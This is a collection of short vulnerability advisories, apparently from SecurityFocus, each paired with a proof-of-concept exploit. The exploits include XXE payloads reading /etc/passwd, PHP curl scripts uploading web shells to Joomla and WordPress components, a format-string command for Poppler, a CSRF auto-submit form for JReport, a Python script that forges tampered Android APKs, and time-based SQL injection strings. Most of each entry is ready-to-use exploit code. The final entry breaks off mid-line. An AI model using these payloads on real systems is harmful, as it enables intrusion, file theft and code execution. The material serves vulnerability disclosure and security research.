source: https://www.securityfocus.com/bid/63260/info Apache Shindig is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Apache Shindig 2.5.0 is vulnerable. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]> <Module> <ModulePrefs title="Test Application"> <Require feature="opensocial-0.9" /> </ModulePrefs> <Content type="html"> &passwd; hello </Content> </Module>

source: https://www.securityfocus.com/bid/63287/info The Maian15 component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application. <?php $headers = array("Content-Type: application/octet-stream"); $uploadfile="<?php phpinfo(); ?>"; $ch = curl_init("http://www.example.com/path/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=shell.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

source: https://www.securityfocus.com/bid/63374/info Poppler is prone to a local format-string vulnerability because it fails to sanitize user-supplied input. An attacker may exploit this issue to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will likely result in a denial-of-service condition. Versions prior to Poppler 0.24.3 are vulnerable. ./pdfseparate -f 1 -l 1 aPdfFile.pdf "%x%x%x%x%x%x%n"

source: https://www.securityfocus.com/bid/63363/info JReport is prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. <html> <body> <form name="foo" action="https://www.example.com/jreport/jinfonet/dealSchedules.jsp"method="post"> <input type=hidden name="d1" value="2013-08-03%252014%253a20%253a41.29"> <input type=hidden name="cmd" value="cmd_delete_schedules"> <input type=hidden name="taskClass" value="APIDemoDynamicExportTask"> <input type=hidden name="taskUrl" value="schedulePage.jsp%3Fjrs.cmd%3Djrs.get_edit_schd_page%26jrs.task_id%3D2013-08-03%252014%253a20%253a41.29%26jrs.catalog%3D%252fSecurity%252fSecurity.cat%26jrs.report%3D%252fSecurity%252fBank_User%2520Activation.cls%26jrs.path%3D%2FUSERFOLDERPATH%2Fadmin"> <input type=hidden name="jrs.path" value="%2FUSERFOLDERPATH%2Fadmin"> </form> <script> document.foo.submit(); </script> </body> </html>

source: https://www.securityfocus.com/bid/63431/info Openbravo ERP is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. Openbravo ERP 2.5 and 3.0 are vulnerable. <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ELEMENT comments ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]> <ob:Openbravo xmlns:ob="http://www.example.com" xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance"> <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L"> <id>C970393BDF6C43E2B030D23482D88EED</id> <comments>&xxe;</comments> </Product> </ob:Openbravo>

source: https://www.securityfocus.com/bid/63547/info Google Android is prone to a security-bypass vulnerability. Attackers can exploit this issue to bypass certain security restrictions to perform unauthorized actions. This may aid in further attacks. Android 4.4 is vulnerable; other versions may also be affected. #!/usr/bin/python import zipfile import struct import sys # usage: ./pocB.py new.apk old.apk file data zout = zipfile.ZipFile(sys.argv[1], "w") zin = zipfile.ZipFile(sys.argv[2], "r") replace = sys.argv[3] new = open(sys.argv[4], 'r').read() fp = zout.fp for name in zin.namelist(): old = zin.read(name) if name != replace: zout.writestr(name, old, zipfile.ZIP_DEFLATED) else: assert len(new) <= len(old) # write header, old data, and record offset zout.writestr(name, old, zipfile.ZIP_STORED) offset = fp.tell() # return to name length, set to skip old data fp.seek(-len(old) -len(name) -4, 1) fp.write(struct.pack('<h', len(name) + len(old))) # after old data, write new data \0 padded fp.seek(offset) fp.write(new) fp.write('\0' * (len(old) - len(new))) zout.close() zin.close()

source: https://www.securityfocus.com/bid/63523/info The This Way Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible. <?php $uploadfile="upl.php"; $ch = curl_init("http://[localcrot]/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>

source: https://www.securityfocus.com/bid/63435/info Course Registration Management System is prone to multiple cross-site scripting and multiple SQL-injection vulnerabilities because it fails to properly sanitize user-supplied input. Attackers can exploit these issues to execute arbitrary code in the context of the browser, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; other attacks are also possible. Course Registration Management System 2.2.1 is vulnerable; other versions may also be affected. http://example.com/add_user.php (POST - params: work_tel, lastname, email, gmc_reg, job_title, firstname) http://example.com/login.php (POST - params: username) http://example.com/auth.php (POST - params: username) http://example.com/forgotten_password.php (POST - username) username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' http://example.com/add_user.php (POST - email) email='+(SELECT 1 FROM (SELECT SLEEP(25))A)+' http://example.com/login.php (POST - username) username='+(SELECT 1 FROM (SELECT SLEEP(25))A)+